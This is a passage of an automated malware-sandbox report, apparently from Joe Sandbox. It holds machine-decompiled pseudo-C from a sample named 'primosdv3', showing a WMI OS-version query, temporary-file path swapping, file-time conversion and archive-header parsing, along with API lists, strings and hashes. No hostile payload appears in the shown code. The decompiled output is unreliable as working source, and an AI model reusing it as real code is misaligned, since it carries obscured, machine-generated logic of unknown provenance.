							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_t122 =  *((intOrPtr*)(_t162 - 0x28));
							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
								E00C6AEF6(_t122);
							}
							if(_t155 >= 0) {
								_t81 =  *(_t162 - 0x18);
								 *(_t162 - 0x1c) = _t105;
								 *(_t162 - 0x24) = _t105;
								if(_t81 != 0) {
									while(1) {
										 *0xc93278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
										 *((intOrPtr*)( *_t81 + 0x10))();
										if( *(_t162 - 0x24) == 0) {
											goto L26;
										}
										_t92 =  *(_t162 - 0x1c);
										 *0xc93278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
										 *((intOrPtr*)( *_t92 + 0x10))();
										_t105 = _t105 | E00C823F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
										_t98 =  *(_t162 - 0x1c);
										 *0xc93278(_t98);
										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
										_t81 =  *(_t162 - 0x18);
										if(_t81 != 0) {
											continue;
										}
										goto L26;
									}
								}
								L26:
								_t82 =  *((intOrPtr*)(_t162 - 0x10));
								 *0xc93278(_t82);
								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
								_t85 =  *((intOrPtr*)(_t162 - 0x14));
								 *0xc93278(_t85);
								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
								_t127 =  *(_t162 - 0x18);
								 *0xc93278(_t127);
								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
								_t70 = _t105;
							} else {
								goto L20;
							}
						}
					}
				} else {
					_t70 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
				return _t70;
			}

0x00c6af29
0x00c6af38
0x00c6af39
0x00c6af3f
0x00c6af41
0x00c6af42
0x00c6af43
0x00c6af48
0x00c6af53
0x00c6af5c
0x00c6af64
0x00c6af6c
0x00c6af6e
0x00c6af73
0x00c6af79
0x00c6af75
0x00c6af75
0x00c6af75
0x00c6af7b
0x00c6af90
0x00c6af96
0x00c6af99
0x00c6af9d
0x00c6af9f
0x00c6afa4
0x00c6afa6
0x00c6afa6
0x00c6afad
0x00c6b05b
0x00c6b05b
0x00c6b066
0x00c6b06c
0x00c6b06e
0x00c6afb3
0x00c6afb3
0x00c6afb4
0x00c6afb5
0x00c6afb7
0x00c6afb9
0x00c6afba
0x00c6afbb
0x00c6afbd
0x00c6afc8
0x00c6b048
0x00c6b048
0x00c6b053
0x00c6b059
0x00000000
0x00c6afca
0x00c6afca
0x00c6afd2
0x00c6afd5
0x00c6afdc
0x00c6afe4
0x00c6afe7
0x00c6afec
0x00c6afee
0x00c6aff4
0x00c6affa
0x00c6aff6
0x00c6aff6
0x00c6aff6
0x00c6affc
0x00c6b000
0x00c6b006
0x00c6b002
0x00c6b002
0x00c6b002
0x00c6b008
0x00c6b01a
0x00c6b020
0x00c6b023
0x00c6b026
0x00c6b02a
0x00c6b02c
0x00c6b031
0x00c6b031
0x00c6b034
0x00c6b038
0x00c6b03d
0x00c6b03f
0x00c6b03f
0x00c6b046
0x00c6b075
0x00c6b078
0x00c6b07b
0x00c6b080
0x00c6b084
0x00c6b096
0x00c6b09c
0x00c6b0a2
0x00000000
0x00000000
0x00c6b0a4
0x00c6b0b9
0x00c6b0bf
0x00c6b0d5
0x00c6b0dc
0x00c6b0e2
0x00c6b0ed
0x00c6b0f3
0x00c6b0f5
0x00c6b0fa
0x00000000
0x00000000
0x00000000
0x00c6b0fa
0x00c6b084
0x00c6b0fc
0x00c6b0fc
0x00c6b107
0x00c6b10d
0x00c6b10f
0x00c6b11a
0x00c6b120
0x00c6b122
0x00c6b12d
0x00c6b133
0x00c6b135
0x00000000
0x00000000
0x00000000
0x00c6b046
0x00c6afc8
0x00c6af55
0x00c6af55
0x00c6af55
0x00c6b13d
0x00c6b145

APIs

__EH_prolog.LIBCMT ref: 00C6AF29

Strings

Windows 10, xrefs: 00C6B0C2
SELECT * FROM Win32_OperatingSystem, xrefs: 00C6AFCA
Name, xrefs: 00C6B0B0
WQL, xrefs: 00C6AFDC
ROOT\CIMV2, xrefs: 00C6AF5C

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
Instruction ID: 7c6d35f14cd51a9056aa0e5cc3d2e1e952e541ec67a081dab287688475f5e331
Opcode Fuzzy Hash: 654b66579cff2e8b75e08c9000bbbf3557d7a60d107849bb5cd7ec139ba01aee
Instruction Fuzzy Hash: CD715D71A00619EFDF24DFA5CC99AAFBBB9FF48710B140159E512E72A0CB30AE41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C69382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00C69382() {
				void* _t32;
				short _t33;
				long _t35;
				void* _t40;
				short _t42;
				void* _t66;
				intOrPtr _t69;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00C7EB78(0xc928b1, _t84);
				E00C7EC50(0x503c);
				_t82 =  *(_t84 + 8);
				_t32 = _t84 - 0x4048;
				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
				if(_t32 == 0 || _t32 >= 0x800) {
					L20:
					_t33 = 0;
					__eflags = 0;
				} else {
					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
					if(_t35 == 0) {
						goto L20;
					} else {
						_t91 = _t35 - 0x800;
						if(_t35 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00C6C29A(_t91, _t84 - 0x4048);
							_t78 = E00C6C29A(_t91, _t84 - 0x5048);
							_t69 = 0;
							if( *_t39 == 0) {
								goto L20;
							} else {
								_t40 = E00C71FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t40;
								if(_t40 == 0) {
									goto L20;
								} else {
									_t42 = E00C71FBB(E00C6C29A(_t93, _t82), _t78);
									if(_t42 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t42;
										_t79 = 0;
										while(1) {
											_t95 = _t42;
											if(_t42 != 0) {
												break;
											}
											E00C70602(_t84 - 0x1010, _t82, 0x800);
											E00C64092(E00C6C29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00C6A231(_t84 - 0x1010) == 0) {
												_t42 =  *(_t84 - 0x1010);
											} else {
												_t42 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t42;
												if(_t42 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00C70602(_t84 - 0x3048, _t82, 0x800);
										_push(0x800);
										E00C6C310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00C69556(_t84 - 0x2048);
											 *((intOrPtr*)(_t84 - 4)) = _t69;
											if(E00C6A231(_t82) == 0) {
												_t69 = E00C6966E(_t84 - 0x2048, _t82, 0x12);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
											if(_t69 != 0) {
												E00C69620(_t84 - 0x2048);
												E00C6974E(_t84 - 0x2048);
											}
											E00C6959A(_t84 - 0x2048);
											_t33 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t33;
			}

0x00c69387
0x00c69391
0x00c69398
0x00c6939b
0x00c693aa
0x00c693b2
0x00c69543
0x00c69543
0x00c69543
0x00c693c0
0x00c693c9
0x00c693d1
0x00000000
0x00c693d7
0x00c693d7
0x00c693d9
0x00000000
0x00c693df
0x00c693eb
0x00c693fa
0x00c693fc
0x00c69401
0x00000000
0x00c69407
0x00c6940b
0x00c69410
0x00c69412
0x00000000
0x00c69418
0x00c69420
0x00c69427
0x00000000
0x00c6942d
0x00c6942d
0x00c69434
0x00c69436
0x00c69436
0x00c69439
0x00000000
0x00000000
0x00c69448
0x00c69465
0x00c6946a
0x00c6947b
0x00c69488
0x00c6947d
0x00c6947d
0x00c6947f
0x00c6947f
0x00c6948f
0x00c69498
0x00000000
0x00c6949a
0x00c6949a
0x00c6949d
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6949d
0x00000000
0x00c69498
0x00c694b1
0x00c694b6
0x00c694c1
0x00c694dc
0x00000000
0x00c694de
0x00c694e4
0x00c694ea
0x00c694f4
0x00c69504
0x00c69504
0x00c69514
0x00c6951c
0x00c69524
0x00c6952f
0x00c6952f
0x00c6953a
0x00c6953f
0x00c6953f
0x00c694dc
0x00c69427
0x00c69412
0x00c69401
0x00c693d9
0x00c693d1
0x00c69545
0x00c6954b
0x00c69553

APIs

__EH_prolog.LIBCMT ref: 00C69387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C693AA
GetShortPathNameW.KERNEL32 ref: 00C693C9

Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2

Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1

_swprintf.LIBCMT ref: 00C69465

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

MoveFileW.KERNEL32(?,?), ref: 00C694D4
MoveFileW.KERNEL32(?,?), ref: 00C69514

Strings

rtmp%d, xrefs: 00C6944E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 6df1b7de4282156dd2e4f9833c0e3e339ebed25dc0fae6fef5ada8a3523521f6
Instruction ID: b585ff06563527461d08e3b18eb4807eb4a539562b09bbeb5cea39297c97756f
Opcode Fuzzy Hash: 6df1b7de4282156dd2e4f9833c0e3e339ebed25dc0fae6fef5ada8a3523521f6
Instruction Fuzzy Hash: 734179B1900258A6DF31EBA0CCD5EEE737CEF45740F0049A5B65AE3051DB388B89EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C71218 Relevance: 12.1, APIs: 8, Instructions: 125
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C71218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				intOrPtr* _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				signed int _t78;
				long _t82;
				signed int _t87;
				signed int _t92;
				void* _t93;
				long _t94;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int* _t99;
				void* _t100;
				signed int _t101;

				_t100 = __ebp;
				_t94 = __edx;
				_t97 = __ecx;
				_v68 = __ecx;
				_v80 = E00C7F1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76.dwLowDateTime = _t94;
				if(E00C6B146() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v76);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v76);
				}
				_push(_t100);
				FileTimeToSystemTime( &_v76,  &_v48);
				_t99 = _a4;
				_t92 = _v48.wDay & 0x0000ffff;
				_t101 = _v48.wMonth & 0x0000ffff;
				_t95 = _v48.wYear & 0x0000ffff;
				_t99[3] = _v48.wHour & 0x0000ffff;
				_t87 = _t92 - 1;
				_t99[4] = _v48.wMinute & 0x0000ffff;
				_t99[5] = _v48.wSecond & 0x0000ffff;
				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t99 = _v48.wYear & 0x0000ffff;
				_t99[1] = _t101;
				_t99[2] = _t92;
				_t99[8] = _t87;
				_v76.dwLowDateTime = 1;
				if(_t101 > 1) {
					_t96 = _t87;
					_t98 = 0xc9e1a8;
					_t93 = 4;
					while(1) {
						_t87 = _t96;
						if(_t93 > 0x30) {
							break;
						}
						_t93 = _t93 + 4;
						_t87 =  *_t98 + _t96;
						_t82 = _v76.dwLowDateTime + 1;
						_t99[8] = _t87;
						_t98 = _t98 + 4;
						_v76.dwLowDateTime = _t82;
						_t96 = _t87;
						if(_t82 < _t101) {
							continue;
						}
						break;
					}
					_t97 = _v68;
					_t95 = _v48.wYear & 0x0000ffff;
				}
				if(_t101 > 2 && E00C713A4(_t95) != 0) {
					_t99[8] = _t87 + 1;
				}
				_t78 = E00C7F250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
				_t99[6] = _t78;
				return _t78;
			}

0x00c71218
0x00c71218
0x00c7121e
0x00c71225
0x00c71233
0x00c71237
0x00c71245
0x00c71263
0x00c71274
0x00c71284
0x00c71294
0x00c712a6
0x00c712ae
0x00c712b4
0x00c712ba
0x00c712be
0x00c712c0
0x00c71247
0x00c71251
0x00c71251
0x00c712c4
0x00c712cf
0x00c712d5
0x00c712de
0x00c712e3
0x00c712e8
0x00c712ed
0x00c712f5
0x00c712f8
0x00c71300
0x00c71308
0x00c7130e
0x00c71310
0x00c71313
0x00c71316
0x00c71319
0x00c7131f
0x00c71323
0x00c71325
0x00c7132a
0x00c7132b
0x00c7132b
0x00c71330
0x00000000
0x00000000
0x00c71334
0x00c7133b
0x00c7133d
0x00c7133e
0x00c71341
0x00c71344
0x00c71348
0x00c7134c
0x00000000
0x00000000
0x00000000
0x00c7134c
0x00c7134e
0x00c71352
0x00c71352
0x00c7135b
0x00c7136a
0x00c7136a
0x00c71379
0x00c7137f
0x00c71387

APIs

__aulldiv.LIBCMT ref: 00C7122E

Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00C71251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00C71263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00C71274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00C712CF
__aullrem.LIBCMT ref: 00C71379

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
Instruction ID: ae319a58b255c386bd7e62fbfdbe527be8329a5e471b89454cbadf2a021b0dec
Opcode Fuzzy Hash: d8a43c97e1b54c65a6237f0c5f706dc6b4a235507ecfca11dd2ccd8c6b256ef4
Instruction Fuzzy Hash: 1E41F8B1508345AFC710DF65C884A6FBBE9FF88314F04892EF99AC2210E738E659DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C62210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00C62210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
				char _v4;
				signed char _v5;
				char _v12;
				char _v16;
				signed char _t135;
				char _t138;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t165;
				signed int _t176;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed char _t221;
				signed char _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr _t240;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				signed char _t263;
				signed int _t264;
				signed int _t266;
				intOrPtr _t273;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t306;
				intOrPtr _t311;
				signed int _t313;
				intOrPtr _t315;
				signed char _t318;
				char _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				intOrPtr* _t334;
				signed int _t337;
				signed int _t338;
				intOrPtr _t340;
				void* _t341;
				signed int _t345;
				signed int _t348;
				signed int _t361;

				_t313 = __edx;
				E00C7EC50(0x20ac);
				_t315 = _a8368;
				_a12 = __ecx;
				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
				if(_t135 <  *(_t315 + 0x1c)) {
					L96:
					return _t135;
				}
				 *(_t315 + 0x1c) = _t135;
				if(_a8372 >= 2) {
					_t240 = _a8376;
					while(1) {
						_t135 = E00C6CCFB();
						_t244 = _t135;
						_t345 = _t313;
						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
							break;
						}
						_t318 =  *(_t315 + 0x1c);
						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
						if(_t135 == 0) {
							break;
						}
						_t348 = _t313;
						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
							break;
						} else {
							_a8 = _t318 + _t244;
							_t138 = E00C6CCFB();
							_t337 = _t313;
							_t319 = _t138;
							_t313 = _a8;
							_t247 = _t313 -  *(_t315 + 0x1c);
							_a20 = _t247;
							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
								 *((char*)(_t240 + 0x1e)) = _t138;
								_t234 = E00C6CCFB();
								_a16 = _t234;
								if((_t234 & 0x00000001) != 0) {
									_t237 = E00C6CCFB();
									if((_t237 | _t313) != 0) {
										_t311 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
									}
									_t234 = _a16;
								}
								if((_t234 & 0x00000002) != 0) {
									_t235 = E00C6CCFB();
									if((_t235 | _t313) != 0) {
										_t306 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
									}
								}
								_t247 = _a20;
								_t313 = _a8;
							}
							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
								_t361 = _t337;
								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
									goto L94;
								} else {
									_t320 = _t319 - 1;
									if(_t320 == 0) {
										_t140 = E00C6CCFB();
										__eflags = _t140;
										if(_t140 == 0) {
											_t141 = E00C6CCFB();
											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E00C6CBAF(_t315) & 0x000000ff;
											 *(_t240 + 0x10ec) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												E00C64092( &_a28, 0x14, L"xc%u", _t145);
												_t341 = _t341 + 0x10;
												E00C6403D(_a12, _t240 + 0x28,  &_a28);
											}
											E00C6CC5D(_t315, _t240 + 0x10a1, 0x10);
											E00C6CC5D(_t315, _t240 + 0x10b1, 0x10);
											__eflags =  *(_t240 + 0x10c1);
											if( *(_t240 + 0x10c1) != 0) {
												_t321 = _t240 + 0x10c2;
												E00C6CC5D(_t315, _t321, 8);
												E00C6CC5D(_t315,  &_a16, 4);
												E00C70016( &_a52);
												_push(8);
												_push(_t321);
												_push( &_a48);
												E00C7005C();
												_push( &_v4);
												E00C6FF33( &_a36);
												_t162 = E00C80C4A( &_v16,  &_v12, 4);
												_t341 = _t341 + 0xc;
												asm("sbb al, al");
												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
												 *(_t240 + 0x10c1) =  ~_t162 + 1;
												if( *((intOrPtr*)(_t240 + 4)) == 3) {
													_t165 = E00C80C4A(_t321, 0xc936a8, 8);
													_t341 = _t341 + 0xc;
													__eflags = _t165;
													if(_t165 == 0) {
														 *(_t240 + 0x10c1) = _t165;
													}
												}
											}
											 *((char*)(_t240 + 0x10a0)) = 1;
											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
											 *((char*)(_t240 + 0x109b)) = 1;
										} else {
											E00C64092( &_a28, 0x14, L"x%u", _t140);
											_t341 = _t341 + 0x10;
											E00C6403D(_a12, _t240 + 0x28,  &_a28);
										}
										goto L94;
									}
									_t322 = _t320 - 1;
									if(_t322 == 0) {
										_t176 = E00C6CCFB();
										__eflags = _t176;
										if(_t176 != 0) {
											goto L94;
										}
										_push(0x20);
										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
										_push(_t240 + 0x1074);
										L37:
										E00C6CC5D(_t315);
										goto L94;
									}
									_t323 = _t322 - 1;
									if(_t323 == 0) {
										__eflags = _t247 - 5;
										if(_t247 < 5) {
											goto L94;
										}
										_t179 = E00C6CCFB();
										_a3 = _t179;
										_t180 = _t179 & 0x00000001;
										_t263 = _a3;
										_a4 = _t180;
										_t313 = _t263 & 0x00000002;
										__eflags = _t313;
										_a5 = _t313;
										if(_t313 != 0) {
											_t279 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00C715BB(_t240 + 0x1040, E00C6CC3D(_t279, __eflags), _t313);
											} else {
												E00C7158F(_t240 + 0x1040, E00C6CBFB(_t279), 0);
											}
											_t263 = _a3;
											_t180 = _a4;
										}
										_t264 = _t263 & 0x00000004;
										__eflags = _t264;
										_a6 = _t264;
										if(_t264 != 0) {
											_t326 = _t240 + 0x1048;
											_t276 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00C715BB(_t326, E00C6CC3D(_t276, __eflags), _t313);
											} else {
												E00C7158F(_t326, E00C6CBFB(_t276), 0);
											}
										}
										_t181 = _a3;
										_t266 = _t181 & 0x00000008;
										__eflags = _t266;
										_a7 = _t266;
										if(_t266 == 0) {
											__eflags = _a4;
											if(_a4 == 0) {
												goto L94;
											}
											goto L72;
										} else {
											__eflags = _a4;
											_t325 = _t240 + 0x1050;
											_t273 = _t315;
											if(__eflags == 0) {
												E00C715BB(_t325, E00C6CC3D(_t273, __eflags), _t313);
												goto L94;
											}
											E00C7158F(_t325, E00C6CBFB(_t273), 0);
											_t181 = _v5;
											L72:
											__eflags = _t181 & 0x00000010;
											if((_t181 & 0x00000010) != 0) {
												__eflags = _a5;
												if(_a5 == 0) {
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
												} else {
													_t188 = E00C6CBFB(_t315);
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
													_t189 = _t188 & 0x3fffffff;
													__eflags = _t189 - 0x3b9aca00;
													if(_t189 < 0x3b9aca00) {
														E00C71208(_t240 + 0x1040, _t189, 0);
													}
												}
												__eflags = _a6;
												if(_a6 != 0) {
													_t186 = E00C6CBFB(_t315) & _t338;
													__eflags = _t186 - _t324;
													if(_t186 < _t324) {
														E00C71208(_t240 + 0x1048, _t186, 0);
													}
												}
												__eflags = _a7;
												if(_a7 != 0) {
													_t183 = E00C6CBFB(_t315) & _t338;
													__eflags = _t183 - _t324;
													if(_t183 < _t324) {
														E00C71208(_t240 + 0x1050, _t183, 0);
													}
												}
											}
											goto L94;
										}
									}
									_t327 = _t323 - 1;
									if(_t327 == 0) {
										__eflags = _t247 - 1;
										if(_t247 >= 1) {
											E00C6CCFB();
											__eflags = E00C6CCFB();
											if(__eflags != 0) {
												 *((char*)(_t240 + 0x10f3)) = 1;
												E00C64092( &_a28, 0x14, L";%u", _t204);
												_t341 = _t341 + 0x10;
												E00C705DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
											}
										}
										goto L94;
									}
									_t328 = _t327 - 1;
									if(_t328 == 0) {
										 *((intOrPtr*)(_t240 + 0x1100)) = E00C6CCFB();
										 *(_t240 + 0x2104) = E00C6CCFB() & 0x00000001;
										_t329 = E00C6CCFB();
										_a172 = 0;
										__eflags = _t329 - 0x1fff;
										if(_t329 < 0x1fff) {
											E00C6CC5D(_t315,  &_a172, _t329);
											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
										}
										E00C6C335( &_a172,  &_a172, 0x2000);
										_push(0x800);
										_push(_t240 + 0x1104);
										_push( &_a160);
										E00C71C3B();
										goto L94;
									}
									_t330 = _t328 - 1;
									if(_t330 == 0) {
										_t221 = E00C6CCFB();
										_a16 = _t221;
										_t339 = _t240 + 0x2108;
										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
										 *((char*)(_t240 + 0x2208)) = 0;
										 *((char*)(_t240 + 0x2108)) = 0;
										__eflags = _t221 & 0x00000001;
										if((_t221 & 0x00000001) != 0) {
											_t332 = E00C6CCFB();
											__eflags = _t332 - 0xff;
											if(_t332 >= 0xff) {
												_t332 = 0xff;
											}
											E00C6CC5D(_t315, _t339, _t332);
											_t221 = _a8;
											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
										}
										__eflags = _t221 & 0x00000002;
										if((_t221 & 0x00000002) != 0) {
											_t331 = E00C6CCFB();
											__eflags = _t331 - 0xff;
											if(_t331 >= 0xff) {
												_t331 = 0xff;
											}
											E00C6CC5D(_t315, _t240 + 0x2208, _t331);
											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
										}
										__eflags =  *(_t240 + 0x2106);
										if( *(_t240 + 0x2106) != 0) {
											 *((intOrPtr*)(_t240 + 0x2308)) = E00C6CCFB();
										}
										__eflags =  *(_t240 + 0x2107);
										if( *(_t240 + 0x2107) != 0) {
											 *((intOrPtr*)(_t240 + 0x230c)) = E00C6CCFB();
										}
